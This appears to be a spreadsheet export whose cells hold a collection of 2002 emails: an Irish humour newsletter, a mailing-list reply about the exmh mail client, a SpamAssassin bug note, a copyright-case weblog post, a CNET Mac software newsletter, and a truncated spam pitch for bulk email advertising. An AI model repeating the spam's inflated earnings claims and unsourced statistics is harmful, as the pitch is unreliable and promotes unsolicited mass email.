                         Insignificant Matters Heavily Overemphasised
                                                    &lt;www.imho.8m.com&gt;
                                                           by Hugh mT
 ====================================================================
 It's time again for IMHO, brought to you as always by the letters I,
 M, H and O, in partnership with the goofy electronic hubris of the
 Irish Internet.  IMHO will be in orbit again sometime in early
 December.
    * * *   Back issues online at http://www.imho.8m.com   * * *
 Formatted for easy reading in Courier New, so you might like to
 print it out in that font.  IMHO also contains hyperlinks to sites
 of interest or relevance: read it while online, too, and check 'em
 out.
 In case you're wondering, we Bowdlerise colourful language (e.g.
 'bas7ard') so that IMHO can sneak past corporate obscenity filters,
 like a Dublin solicitor's staff car zooming slyly down the taxi lane
 with a cheap post-regulation taxi plate on top: http://xsls.com?81
 ====================================================================
 Heartfelt thanks this ish to AnnieT, Sean, Ray and the indefatigable
 Mr Brennan for leads and content.  And a big Brava! of
 congratulations to Jacqueline on her outstanding occupational
 odyssey, plus a Bravo! of felicitations to Badger for his famous
 fourwheeled feat.
 ====================================================================
 Please FORWARD this to anyone you think might be interested: if
 that's how you received this, then please SUBSCRIBE by sending mail
 to imho@eircom.net with the word 'subscribe' in the subject line.
 You didn't see the previous IMHOs?  They're either in your Junk Mail
 folder with the rest of the s9am, or you weren't sent them.  Read
 them online at http://www.imho.8m.com.  But make sure to SUBSCRIBE!
 ====================================================================
 AN INTERNET EIREANNACH............................Ping An Irish Song
 Yet another Irish internet company, Octagon Technologies, closed for
 good this week.  And after reading the phrase for what seemed like
 the umpteen-thousandth time, we were idly wondering how many Irish
 tech companies blamed their misfortunes "on the global downturn":
 http://makeashorterlink.com/?S35A63392
 Oh, so it's about 450 then.  Thanks, Google.
 *
 The death occurred recently of that great Irish washtub musician
 Lonnie Donegan.  RIP.  This seems like an apt time therefore to
 reflect on his many accomplishments: his virtuoso playing of
 utensil-based instruments, his worldwide commercial success, his
 place in history as King of Skiffle, and how he wiped billions of
 yen off the value of the Tokyo stock market:
 http://groups.google.com/groups?selm=373A9C4F.61B@time.life
 ("panic and subsequent 10+% decline of Tokyo Stock Exchange when Reuters
 advised 'Lonnie Donnegan' was dead")
 and also at
 http://xsls.com?80
 ("to Japanese ears it sounded like Ronald Reagan").
 *
 UCD's Literary and Historical Society this week awarded an honorary
 fellowship to the tediously brilliant American multidisciplarian Dr
 Noam Chomsky.  Now the idea of some trifling college society
 awarding a mere honorary fellowship actually sounds rather like an
 insult to us, considering that Niall Quinn and Marian Finucane were
 given *degrees* by DIT the very next day, but then Chomsky
 apparently inspired some of Radiohead's most caterwaulingly blunted
 songs, so we suppose it serves him right.  Anyway, if you're an
 admirer of the great man's hermeutic genius, linguistic philosophy
 or contentious views on US foreign policy, perhaps you might also
 appreciate his amazing interview of Tom Hanks:
 http://www.sadiethepilot.com/aaweb/tapes.htm#tomnnoam
 Very special thanks to IMHO's London correspondent Ray Butler for
 this one.
 *
 Key IMHO contributor Sean Lynch quite realistically predicts a post-
 Budget dole queue for all of us, and wonders if we'll miss those
 cash-and-job cow multinationals when they're gone?   Not if their
 Irish presence was as permanent and impressive as "the world's
 leading risk and insurance services firm", he concludes:
 http://www.marsh.ie
 (compare and contrast with, say, http://www.marsh.co.uk/)
 *
 Also: we've been remiss in the past in not featuring
 EircomTribunal.com's stalwart and righteous campaigning against
 Eircom's crippling rates and crippled infrastructure in this
 country.  Well, we aim to redress that right now, by pointing out
 (1) Their 'Banana Republic' international price comparison page at
 http://www.eircomtribunal.com/dossier_banana_rep.html, which will
 surely make you mad enough to
 (2) Download and print out their marvellously bitter "No More
 Favours For You, Mr Eircom Employee" flyer from
 http://www.eircomtribunal.com/counterstrike_a2_nomore.html, designed
 to be stuck under the windshields of the ubiquitous and bilious
 blue/orange Eircom vans.
 Now if only EircomTribunal.com could somehow could retrieve that
 money we all lost on bloody Eircom shares...
                           * * * * * * * * *
 IMHO'S PICK: JOB....................IMHO HO HO (AND A BOTTLE OF RUM)
 "FATHER CHRISTMAS on a bike - Student - Giving out FREEBIES - Four
 weeks".  No, not us telegraphing our worst nightmare to our shrink,
 but a job description for a position that apparently pays "enough".
 Email tmckeagney@msn.com or hell, cycle into his perfume shop at 128
 The Stephens Green Centre and show him what you can do.
 And hey, if you're a crazy maniac, that's great too.  It's about
 time we had an Irish SANTACON - after all, no force on earth can
 stop one hundred Santas, especially if they're drunk:
 http://www.santarchy.com/
 (from the San Francisco Police Report, "the naughty Santas ... had
 reeked (sic) havoc in the emporium ... in an un-Christmas like
 fashion.")
 *
 Heh.  Disproving the stereotype that all accountants are boring:
 some Dublin 2 company is looking for a "Parti-time bookkeeper" at
 http://xsls.com?83
 *
 Our attention-deficient gaze also fell briefly this week onto a box
 ad in a Sunday paper which is seeking private investors for an
 ADVENTURE SPORTS RETAILING business in Dublin.  Now this probably
 just means selling snowboards or something equally tame, but in our
 imagination we see IMHO readers hunting elephants, dogfighting in
 biplanes over the Wicklow Hills and abseiling down moon craters.
 Just in case we're right, any "smart, experienced partner/investor"
 looking for an "equity stake/board position" should "express"
 "interest" to neptune@atomic.ie.
 You know, it might look like we're giving these people free
 advertising, but by putting their email addresses on the public web,
 we're actually GUARANTEEING them spam...
                           * * * * * * * * *
 IMHO'S PICK: EVENT...........................Allow Us To Demonstrate
 Friday is BUY NOTHING DAY.  For the sake of your own mental health
 and the socio-economic future, we urge you to give it a try.  It's
 not that hard to get through 24 hours without a purchase, and those
 corporate balance sheets sure look funny with a big pre-Christmas
 hole in them.
 The official home of BND is of course Adbusters
 (http://adbusters.org/campaigns/bnd/) and they have a run-down of
 Irish activities at http://xsls.com?84... rather a disappointing line-up
 at this late stage, although the Zombie-Shopping in Galway sounds
 like fun - shame they're moving the day to Saturday, hopefully it's
 not for purpose-defeating reasons ("Friday?  Damn, I'm working the
 late shift at McDonald's... how about Saturday?").  In addition and
 elsewhere you can expect bring-and-trade markets, flypostering, free
 stuff, public speaking and all the other happy faces of democratic
 consumer agitation.  Punk's not dead!  Party for your right to
 fight!  No Logo!  Hare Hare!  And so on.
 *
 We're now going to risk life and limb by mentioning an event which
 is so diametrically opposed to the above that we might just bring
 about the heat-death of the Internet by combining them in the one
 newsletter.
 We speak of course of the benighted and spiritually-denuded sickness
 of the TRILOGY FASHION SHOW in the RDS on December 4th, tickets
 starting at "just E50" (but rising to E395 + VAT, natch).  The
 advertising for this bleak celebration focuses entirely on "the most
 beautiful women in the world" who will grace the Simmonscourt
 Pavilion with their airbrushed emptiness: Tyra Banks, Sophie Dahl
 and Anna Kournikova (not the virus) are the only names we recognise.
 You have to pore pretty closely over the small print of the press
 ads to divine that it's the "new Escada Collection" (the who now?)
 they're modelling.  And in an utterly appropriate and inevitable
 partnership, tickets are available from the cultural sewage
 treatment system that is Ticketmaster.
 http://www.cslassociates.ie/events/trilogy_fashion.htm
                           * * * * * * * * *
 IMHO'S PICK: DOWNLOAD..................Transparent and Unaccountable
 Given our internet focus and the subversive nature of our scurrilous
 publishing agenda, there is only one possible download
 recommendation this week.  It's the brilliant GHOSTZILLA browser, a
 creation of architectural genius which brings office escapism to
 heady new heights.
 Designed to facilitate inconspicuous worktime browsing, Ghostzilla
 sits quietly and invisibly in the background until you summon it
 with a special mouse movement.  It then adapts itself to your
 currently-uppermost application, for example Micro$oft Word, leaving
 Word's toolbars intact while showing web pages in a subtle grayed-
 out wash in the main window.  Images appear in a subdued two-tone
 unless you summon them, and the overall effect is to make it look
 like you're working exactly as you should be.  A casual glance from
 your Office Space boss as he paces past your cubicle shouldn't
 detect anything that looks like browsing.  To think that someone
 devoted their life to creating something so wonderfully juvenile!
 It's a beautiful thing.  Go ghosting at
 http://www.ghostzilla.com.
                           * * * * * * * * *
 IMHO'S PICK: INTERNET^HWS................................ON YER BIKE
 Roll up, roll up roll up!  Segue right this way!  Amazon is now
 selling the celebrated SEGWAY (aka Ginger, aka IT) online, the hype
 of the millennium finally made available to lowly consumers.  You're
 only four months and five thousands bucks away from participating in
 the future of transport, the most fundamental and significant
 breakthrough in human evolution since the invention of the leg, the
 "spirit that can change the world", etc. etc.
 Get out your chequebook and get your Segway at
 http://makeashorterlink.com/?N49A51392.
 *
 The perfect expression of our post-modern mania for meta-media
 (whoah! Easy, Chomsky!) is the utterly compelling 'Hoax Photo Test'
 at http://www.museumofhoaxes.com/tests/hoaxphototest.html
 (If you've seen this already, that's prolly 'cos the mighty B3TA.com
 featured it last Friday - credit where it's due)
 *
 "Imagine being able to run a Google-like search on your life," says
 one of the prophets of doom behind MyLifeBits, an incredibly Dickian
 personalised self-database being developed by - who else? -
 Microsoft.  By cataloguing every single artifact of your life
 history, storing everything in an online repository, you build a
 searchable index of every conversation, document, movement, event
 and action that you ever generate or perform.  It's a continuous
 real-time alibi recorder.  It's a voluntary submission of every
 second of existence to information overload.  It's a system that can
 show you all the photos you were ever in, tell you exactly how many
 phonecalls you've ever made, or retrieve an mpeg of you going to the
 toilet in March, 1986:
 http://www.newscientist.com/news/news.jsp?id=ns99993084
 Also: we knew that modern innovation was roaring ahead at a
 blistering pace, but can MyLifeBits really allow "time-shifting"?
 http://research.microsoft.com/barc/MediaPresence/MyLifeBits.asp
 For a fictional (OR IS IT???) look at where this sinister technology
 might just lead, check out this wonderful piece of short science
 fiction (OR IS IT???):
 http://www.ftrain.com/robot_exclusion_protocol.html
 ("I'm a Googlebot!  I will not kill you.")
 *
 The newest in the intriguing development of really sick-minded God-
 perspective Flash games (e.g. suicide bombers at
 http://www.albinoblacksheep.com/flash/kaboom.html, giant human-burning
 magnifying glass at http://xsls.com?82) has arrived... boasting a title as
 bereft of imagination as the gameplay is of taste, it's 'Pedestrian
 Killer':
 http://www.flaboratorium.org/data/flabor/4/4.htm
 But if you prefer God-games which let you manipulate the very atoms
 of creation, check out the awe-inspiring microscopic version of
 Tetris using computer-controlled microspheres these loons have
 created:
 http://www.nat.vu.nl/~joost/complex/index.html.
 *
 We Irish are sometimes so uncultured, compared to our continental
 cousins - even in things you'd expect us to be good at, like
 vandalism.  Here we get inarticulate clowns with cans of red paint
 daubing "666" on the gates of Cardinal Connell's palatial Drumcondra
 residence... whereas in Paris, to pick an example out of the blue,
 egghead situationists sneakily attach absurdist plaques (e.g. "On
 April 17, 1967, nothing happened here") onto public buildings:
 http://news.bbc.co.uk/2/hi/europe/2478161.stm
 *
 Microsoft have co-opted the AmIHotOrNot concept, as is their wont, mixed
 it up with a bit of Miss World, and come up with the 'Microsoft Office v.
 X Integrated Experience', or Ms. M.o.X.i.e. competition:
 http://www.microsoft.com/mac/officex/contests/votemain.asp
 Was it for this Emily Wilding Davison died beneath King George V's horse?
 Was it for this that all those bras were burned?  It's like Girl Power
 never happened.
 *
 When good TiVos go bad: you tape one episode of Ellen, they assume
 you're gay:
 http://online.wsj.com/article_email/0,,SB1038261936872356908,00.html
                           * * * * * * * * *
 LEGACY MEDIA.................There Was Nothing In The Air That Night
 IRISH TV: If you rush straight home from work after reading this on
 Thursday, you might catch the second semi-final of corny but
 challenging elimination quiz IT'S NOT THE ANSWER (RTE1, 17:30).
 Come on the beardy guy!  The final's on at the same time tomorrow.
 Calm down from all that excitement with the laughable one-hour FAIR
 CITY murder trial special (RTE1, 20:00) - it's quite brilliant how
 the risible scripts really bring out the absolute worst in truly
 terrible actors.  Settle down with a few G&amp;Ts to watch PRIME TIME on
 the same channel at 21:30, where they're discussing Ireland's
 alcoholic epidemic and its attendant social problems, or waste them
 on either the bottom-scraping POLICE ACADEMY 3 (N2, 21:30) or the
 geriatric 1978 blockbuster COMA (TG4, 22:05).
 Friday night, and after a hard day of buying nothing you can flop in
 front of creepy Hitler doco SIX MOST EVIL MEN (N2, 21:00).  Near as
 we can tell, the other evil men are Macauley Culkin in UNCLE BUCK
 (TV3, 20:00), gossip columnist WINCHELL in a solid eponymous biopic
 (N2, 21:30), the big boss bad guy - is it Kang? Kane? Cowen? - in
 MORTAL KOMBAT (TG4, 21:25), Mel Gibson in predictable 80s drug
 thriller TEQUILA SUNRISE (RTE1, 23:50), and Quentin Tarantino
 jumping on his own bandwagon in DESTINY TURNS ON THE RADIO (TV3,
 0:50).  Hang on, Dave Fanning might be one of the evil men too: he's
 presenting THE LAST BROADCAST on Network 2 at 23:35.
                           * * * * * * * * *
 COLOPHON....................................................APOLOGIA
 We'd like to focus mainly on the IRISH Internet, but, uh, we were
 sick that day.  Please help us out by mailing in your topical Irish
 net news, your high-profile .ie failures, your worthy Gaelic
 successes, your hilarious local web misadventures, anything that
 seems messed-up, inappropriate or insane... or just mail us your
 feedback.  (That address is imho@eircom.net)
 But whatever you do, PLEASE PLEASE PLEASE send this on to as many
 people as you can.  If you don't, hostile scripts embedded in this
 character string will disable your 'Forward' button forever:
 ~:|``?
 ====================================================================
 SUBSCRIBE by sending mail to imho@eircom.net with the word
 'subscribe' in the subject line.
 UNSUBSCRIBE by sending mail to imho@eircom.net with the word
 'unsubscribe' in the subject line.
 ====================================================================
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Thu, 12 Sep 2002 23:26:33 -0500
     From:        Hal DeVore &lt;haldevore@acm.org&gt;
     Message-ID:  &lt;23204.1031891193@dimebox&gt;
   | 1) Right click on the folder label in the folder list
 That (the way I have it configured, and it sounds as if the way Tony does
 too) just does a move (rather than select as target without moving).
 Of course, if you can manage to get no messages currently selected, then
 it works fine.
   | 2) In the main window, the "+" key puts you into a "change 
   |    folder" mode (the first time you use it after starting exmh),
   |    hit a second + and you go to "set a target" mode.  Type a few
   |    characters of the folder name and hit space for autocomplete.
 This works, but is not nice if you're not using the keyboard, but just
 the mouse.
 Tony: I agree - a nice way to link in one click would be good, and should
 be easy to add, though currently adding mouse bindings (something like
 shift right click would be a good choice) is much harder than adding
 key bindings.
 But note there's no need to "undo" - the way I generally use link, if
 the desired destination folder isn't the current selected target, is
 to right click on the target, which selects it and moves the message,
 (and because I have the "automatic move to the next message on move or
 link option set) select the message again, and then "Link".
 Exmh only permits one uncomitted action to be selected for a message at a
 time, that is, one of delete, move, or link.   Selecting any of those
 implicitly undoes any previous choice from the three (so you cannot
 achieve a "move" by doing a link, then delete, then commit, it needs to
 be link, commit, delete, commit).  (xmh was just the same there incidentally).
   | How's spring shaping up "down under"?
 No meaningful comment from me, I'm not there at the minute.   But I'm told
 that where I'm from it is cold, wet, and miserable, though has been better
 during the day (sunny days, cold nights) for the past few.    In any case,
 all of that is a good enough reason to stay away...
 kre
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 805] Razor2 lookups don't work
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=805
 ------- Additional Comments From felicity@kluge.net  2002-09-02 15:05 -------
 from the sa-dev mailing list:
 "ln -s /dev/null ~root/.razor/razor-agent.log"
 The question is, why does 2.40 do this whereas my 2.31 doesn't. Hmmm.
 ------- You are receiving this mail because: -------
 You are the assignee for the bug, or are watching the assignee.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</si>
  <si>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Eldred Press Watch
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000641
 Date: 2002-10-07T15:55:20-06:00
 Eric Eldred _himself_ was just on Marketplace[1]. 
 NYTimes: Debate to Intensify on Copyright Extension Law[2] (front page of the 
 business section, below the fold). " It will fall to Mr. Lessig, who is a 
 former clerk for Supreme Court Justice Antonin Scalia and who has become a kind 
 of rock star for the digital liberties set, to convince the justices to accept 
 the unconventional analysis. If they do, the decision could be a turning point 
 in redefining a balance between copyright consumers and producers  and the 
 technology companies that are often in the middle." 
 Newsweek: Glitterati vs. Geeks[3]. "Larry Lessig admits it: hes nervous. Who 
 wouldnt be? [...] In its narrowest context, Eldred v. Ashcroft deals with the 
 seemingly arcane issue of the length of copyrights for books, films and music. 
 But its actually a high-noon showdown between two great industries at odds in 
 the age of the Internet." 'Theres a sense of deja vu to this. Television was 
 supposed to be the death of movies. And in 1982, the film industrys 
 silver-tongued lobbyist Jack Valenti testified that the VCR is to the American 
 film producer and the American public as the Boston strangler is to the woman 
 home alone. (Video sales are now the studios biggest moneymaker.) Naturally, 
 Hollywood regards the computer/Internet combo as scarier than Nightmare on Elm 
 Street.'
 [1] http://www.marketplace.org/
 [2] http://www.nytimes.com/2002/10/07/business/media/07ARGU.html
 [3] http://www.msnbc.com/news/817175.asp
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: This week: Deck, Tex-Edit Plus, Boom
</t>
  </si>
  <si>
    <t xml:space="preserve">CNET | DOWNLOAD DISPATCH(Mac Edition)
 July 9, 2002
 Vol. 7, No. 27
 Using a Mac and today's music software, musicians are finding
 that they can create, record, and master their songs without
 the need to pay for expensive studio time. Deck, our Pick of
 the Week, offers a multitrack audio workstation that can take 
 care of all your recording needs, and it's even optimized for 
 OS X. Not just great for music, Deck can be used for film, video,
 and numerous other applications. Get on Deck:
 http://clickthru.online.com/Click?q=ca-iciuQUgFRLpNVUXcl8jfOfRHHUnR 
 Also this week, we've got Captain FTP, for an easy way to
 transfer files; AquilaCalendar, to get you organized under OS X;
 Tex-Edit Plus, a full-featured alternative to the pricier
 text editors; and Boom, a remake of one of the great classic
 arcade games.
 Enjoy!
 Jason Parker
 Assistant Editor, CNET Download.com
 --
 (Unsubscribe instructions are at the bottom of this
 newsletter.)
 &lt;---------------Advertisement---------------&gt;
 Gateway Thin &amp; Light PCs - starting at $1,499!
 Thin and Light, the Gateway(R) 450 blends price, performance,
 and portability.  Systems include Mobile Intel(R) Pentium(R)
 4-M processors, 14.1" and 15" XGA TFT Active Matrix display 
 options, and your choice of operating systems.
 http://clickthru.online.com/Click?q=df-1kJhQLEFHEClWsofbQq-Kh1XhaeR 
 &lt;-------------------------------------------&gt;
 IN THIS ISSUE:
 1. This Week's Top 10 Downloads
 2. Pick of the Week: Deck
 3. The Week in Wares:
              - Internet: Captain FTP
              - Home and Education: AquilaCalendar
              - Development Tools: Tex-Edit Plus
              - Games: Boom
 4. Updates &amp; Drivers
 5. The Week in Reviews: Mac OS X 10.1 prices
 6. Overheard on Download.com
 7. Download.com Outage Notice
 P.S. Got a suggestion for CNET Download.com? Send it to:
 suggestions@download.com
 _____________________________________________________________
 1. This Week's Top 10 Downloads
    1. LimeWire 2.4.4                         5,715 downloads
    2. MacSatellite  1.6.1                    4,402 downloads
    3. LimeWire (OS X) 2.4.4                  4,043 downloads
    4. Hotline Connect Client 1.8.5           3,690 downloads
    5. RealPlayer 8.0                         2,730 downloads
    6. Sound Studio 2.0.3                     2,690 downloads
    7. Internet Explorer 5.1.4                1,949 downloads
    8. Fetch 4.0.1                            1,914 downloads
    9. OmniWeb (OS X) 4.1                     1,732 downloads
   10. DivX for OS X 1.1.8                    1,602 downloads
 For more details on Download.com's most popular files, click
 here: http://clickthru.online.com/Click?q=f5-lTbRQgwx12_yoFk6DmLwgkaZmRPR 
 ______________________________________________________________
 2. Pick of the Week
    DECK
    Version: 3.5
    File size: 6.6MB
    License: Free to try; $399.00 to buy
    Minimum Requirements: Mac OS 9.x or Mac OS X
    Looking for a professional, multitrack audio workstation
    under OS X? This entry from BIAS, while maybe not the most
    attractive Mac app on the block, gives you some hefty
    editing functionality--whether you're working in broadcast,
    film, video, or any other multimedia environment. The big
    brother to BIAS' cheaper Deck LE, Deck 3.5 lets you process
    soundtracks, edit dialogue, spot effects, and record
    ADR-style voice-overs. Deck also supports surround mixing and
    up to four real-time effects plug-ins per track for music
    production. A good value, and one of the first of its kind
    to hit OS X, this midrange app deserves a listen. You're on
    Deck:
    http://clickthru.online.com/Click?q=0a-ZnKCIrrscnFX3e0Bwhq6GOxuYznR 
    Want to review Deck? Submit your opinion here:
    http://clickthru.online.com/Click?q=1f-rvwqI58w5yO75pM1xmYgHobjqmeR 
    Find all of our Picks here:
    http://clickthru.online.com/Click?q=34-pJpSIcd819N9rTb3_tvVyn4IcgyR 
 ______________________________________________________________
 3. The Week in Wares
    IN INTERNET:
    CAPTAIN FTP
    Version: 1.3
    File size: 793K
    License: Free
    Minimum requirements: Mac OS X
    Designed completely from scratch to work with OS X, Captain
    FTP is a new client that makes finding, uploading, and
    downloading files online easier than ever. Since it makes
    full use of OS X's multithreaded multitasking capabilities,
    you can set up as many simultaneous connections as you like
    without slowing down other work on your Mac too much. The
    program supports drag-and-drop operation and resuming
    interrupted downloads. It also sports a built-in address
    book, and integrated BBEdit links. The interface deserves
    awards for clarity and good looks. Grab files in style:
    http://clickthru.online.com/Click?q=49-ZM4cIEpSenMA07qVX4RVXFO5JSFR 
    Want to review Captain FTP? Submit your opinion here:
    http://clickthru.online.com/Click?q=5e-ssGdIn06tVeUdrZhsnStcVTQzc9R 
    Find all of the latest Internet software here:
    http://clickthru.online.com/Click?q=73-__ZeIBBtWIiA9y3T8UEE0WNrUZcR 
    IN HOME AND EDUCATION:
    AQUILACALENDAR
    Version: 1.19
    File size: 1.63MB
    License: Free to try; $20.00 to buy
    Minimum Requirements: Mac OS X
    One of the most frustrating things about off-the-shelf
    organizer applications is that they try to force everyone to
    keep track of things in the same way. AquilaCalendar is
    refreshingly different: you can design your own calendar
    windows, choosing from a plethora of basic options (day,
    week, month, year, several months together, and so on), customize
    your calendar with colors and fonts, and more. To-do lists
    and notes-to-self can be added to calendars or you can add a
    handy clock and holiday markers, among other options. The
    interface fits with the OS X design theme, and makes getting
    organized no more difficult than it has to be. Get organized:
    http://clickthru.online.com/Click?q=88-ec5PQQKx6IOkSTY-rU358atSBbiR 
    Want to review AquilaCalendar? Submit your opinion here:
    http://clickthru.online.com/Click?q=9e-tWQoQtMQJGrFWgHHSCN0U7nQUD4R 
    Find all of the latest home and education software here:
    http://clickthru.online.com/Click?q=b3-QHzxQYKTqehBCndAE64qDAwrPGrR 
    IN DEVELOPMENT TOOLS:
    TEX-EDIT PLUS
    Version: 4.1.3
    File size: 1.17MB
    License: Free to try; $15.00 to buy
    Minimum Requirements: System 7.x
    Before you spend the big bucks on a HTML editor, make sure
    you check out Tex-Edit Plus. This handy little editor offers
    all the basics like unlimited Undo and Redo commands,
    translucent drag-and-drop capabilities, several text styles,
    and the option to highlight selected text. Also, you'll be
    able to use it to act as a text editor for an FTP client
    such as Fetch, Interarchy, NetFinder, or Transmit. Text
    editing made easy:
    http://clickthru.online.com/Click?q=c8-2lPnQWOzdD19YnmMKE-nFr99H2iR 
    Want to review Tex-Edit Plus? Submit your opinion here:
    http://clickthru.online.com/Click?q=dd-tpm0QzWd3Dhh1zgGZP85eXsJh-PR 
    Find all of the latest utilities here:
    http://clickthru.online.com/Click?q=f2-OZVTQUwWCeG9s_A0pvVdi5Z7ednR 
    IN GAMES:
    BOOM
    Version: 1.3
    File size: 2.3MB
    License: Free to try, $15 to buy
    Minimum Requirements: Mac OS 8.x/OS 9.x/OS X
    Remember the classic arcade game Bomberman? Even if you
    don't, you should take this remake of the old classic for a
    spin. Maneuver your way through a maze of corridors while
    setting off bombs to clear a path for your escape. You'll
    also need to pick up coins for extra points and stay clear
    of those nasty aliens to stay alive. Blast your way through
    eight alien-infested areas, each one divided into 10
    subzones, and kick the Big Alien Boss back to where he came
    from. Blast away:
    http://clickthru.online.com/Click?q=07-HqCzI5rq9T_hx8KiqzUbrvLkiDeR 
    Want to review Boom? Submit your opinion here:
    http://clickthru.online.com/Click?q=1c-cs_iIFr43mGGwPjn9kgGa2oXqGyR 
    Find all of the latest games here:
    http://clickthru.online.com/Click?q=32-Gx5IIrQ6j3J9vREDFWVhZSgRXBnR 
 ______________________________________________________________
 4. Updates &amp; Drivers: Stay on Top of Bug Fixes and New Features
    IN INTERNET:
    - DupliMizer 2.4 
      http://clickthru.online.com/Click?q=47-ADmxIIZH1jE333KOiJGu_NEsnEuR 
    - Web Site Maestro 1.2
      http://clickthru.online.com/Click?q=5c-BnjPIZnPblJYt8W53xlZk0f-IosR 
    - Surfer 2.0
      http://clickthru.online.com/Click?q=71-GwdUIEZcfHewddAqwuBXvl3NU2FR 
    IN MULTIMEDIA &amp; DESIGN:
    - Photo Album Builder 1.2
      http://clickthru.online.com/Click?q=86-8fH1QCJonnxDZ9JSjaeTldfVpf4R 
    - Cartoon Editor 1.2.1
      http://clickthru.online.com/Click?q=9b-7-TFQSIo2p0Ld1d0dAVJ9PZAKTrR 
    IN UTILITIES:
    - Battery Endurance Measurer 1.3
      http://clickthru.online.com/Click?q=b0-NZmfQQJr-SlQoW6dxQMKtNX8PQiR 
    - Pixel Tester 2.0
      http://clickthru.online.com/Click?q=c5-8BcDQzOaF-iJTk_zSROUJEymxqPR 
    - SerialStorage 1.0
      http://clickthru.online.com/Click?q=da-dT8jQUPq_nOG5djbjsMVKpv3DxnR 
    IN BUSINESS AND FINANCE:
    - Gym Organizer 6.5
      http://clickthru.online.com/Click?q=ef-04uYQmkHvFhT_HKqBxDVAmoBameR 
    - ChartConstructor 1.0.1
      http://clickthru.online.com/Click?q=04-k9W0IFQXFQMPpsA98BbBL7kOi_yR 
    IN HOME AND EDUCATION:
    - WeatherMan 1.6
      http://clickthru.online.com/Click?q=19-BLe0I2rXOrA0zLlKMZ2Fz8IR7XlR 
    - Computer Cuisine Deluxe 3.1
      http://clickthru.online.com/Click?q=2f-hYaFIqnzAaNFrW5P26D_8gaZjMeR 
 _______________________________________________________________
 5. The Week in Reviews:
    Mac OS X 10.1 prices
    If you haven't made the switch to Apple's beautiful and
    powerful operating system, check out these prices, which may
    change your mind.
    http://clickthru.online.com/Click?q=44-9nxfIZUtYM5fxvgEMLKlXBDgnVsR 
 _______________________________________________________________
 6. Overheard on Download.com
    Here are some user comments about an alternative MP3 player
    for the Mac:
    "Small, Low CPU Usage, Easy"
    "Excellent Alternative"
    "Neat, discreet, powerful"
    "It blows my mind!"
    "One of the best to date!"
    So what's the name of this mystery download? Click here to
    find out:
    http://clickthru.online.com/Click?q=59-y53oIEnthMZswNYlpW-B_KMqztFR 
 _______________________________________________________________
 The e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com
 To sign up for more CNET newsletters, click here:
 http://nl.com.com/servlet/url_login?email=&amp;brand=cnet
 To unsubscribe, click here:
 http://clickthru.online.com/Click?q=6e-2aLjz4Er1KcnmbRj35jce-nUPINqj9RR
 To receive your newsletter in HTML format, click here:
 http://nl.com.com/servlet/url_login?email=&amp;brand=cnet
 For the CNET Newsletters FAQ, click here:
 http://clickthru.online.com/Click?q=83-U-BXQYJ7lFvC8zVtuoAABMMPZ9rR 
 To learn about advertising opportunities in CNET Newsletters, click here:
 http://clickthru.online.com/Click?q=98-FTaOQ_zabmh0qdlCW5CH7esbKRiR 
 Copyright 2002 CNET Networks, Inc. All rights reserved.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Your Order
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Let's say you... Sell a $24.95 PRODUCT or SERVICE.
 2) Let's say you... Broadcast Email FREE to 500,000 PEOPLE DAILY.
 3) Let's say you... Receive JUST 1 ORDER for EVERY 2,500 EMAILS.
 CALCULATION OF YOUR EARNINGS BASED ON THE ABOVE STATISTICS:
 [Day 1]: $4,990  [Week 1]: $34,930  [Month 1]: $139,720
 ----- ---- --- -- -  -
 You now know why you receive so many email advertisements...
 ===&gt; BROADCAST EMAIL ADVERTISING IS EXTREMELY PROFITABLE!
 1) What if you... Sell a $99.95 PRODUCT or SERVICE?
 2) What if you... Broadcast Email to 30,000,000+ PEOPLE MONTHLY?
 3) What if you... Receive 1 ORDER for EVERY 250 EMAILS?
 Just IMAGINE =&gt; DAY 30! ==&gt; WEEK 30!! ===&gt; MONTH 30!!!
 ==&gt; The PROFITS that Broadcast Email CAN GENERATE are AMAZING!!
 ** According to Forrester Research, a Broadcast Email Ad is up
 ** to 15 TIMES MORE LIKELY to Result in a Sale than a Banner Ad!
 ----- ---- --- -- -  -
 [COMPARISON OF INTERNET ADVERTISING METHODS]:
 ==================================================================
 =&gt; A 1/20 Page Targeted Web Site Banner Ad to 5 Million People
    on the Internet can cost you about $100,000.
 =&gt; A 5 Page Targeted Direct Mail Advertisement to 1 Million People
    through the Postal Service can cost you about $500,000.
 =&gt; A 50 Page Targeted HTML Broadcast Email Advertisement with
    Pictures to 50,000,000 People through the Internet is Free.
 ..Which advertising method sounds most appealing to you?
 ==================================================================
 "Targeted direct email advertising is the wave of the future.
  By no other means can you effectively reach your market so
  quickly and inexpensively." - ONLINE PROFITS NEWSLETTER
 "Many business people are finding out that they can now advertise
  in ways that they never could have afforded in the past.  The
  cost of sending mass e-mail is extremely low, and the response
  rate is high and quick." - USA TODAY
 ---- --- -- -  -
 [EXAMPLE OF A PERSONALIZED/TARGETED BROADCAST EMAIL]:
 -------- ------- ------ ----- ---- --- -- -  -
 From: erica@kittiesinc.com
 To: mary@comertom.com
 Subject: About Your Cat!
 Hi Mary,
 Are you interested in receiving up to 80% SAVINGS on CAT SUPPLIES?
 If so, come visit our web site at: http://www.kittiesinc.com
 ==================================================================
 =&gt; With Broadcast Email Software, a Broadcast Email Advertisement
 =&gt; like this one can be AUTOMATICALLY sent to up to 1,000,000 
 =&gt; PEOPLE on a DAILY BASIS with LESS than 2 MINUTES of YOUR TIME!
 * IMT Strategies Reports an AVERAGE of a 16.4% CLICK THROUGH RATE
   from users that have received a Broadcast Email Advertisement!
 ----- ---- --- -- -  -
 A EUROPEAN 2001 BENCHMARK STUDY
 Conducted by Forrester Research Says:
 1) 41% of Consumers Believe Email is a Good Way to Find out About
    New Products.
 2) 36% of Consumers in 13 Countries Read Most of the Promotional
    Email they Receive and 9% Forward the Email to a Friend Because
    They Think it is Valuable.
 ---- --- -- -  -
 BE PREPARED!  You may receive A HUGE AMOUNT of orders within
 minutes of sending out your first Broadcast Email Advertisement!
 * According to Digital Impact, 85% of Broadcast Email Offers are
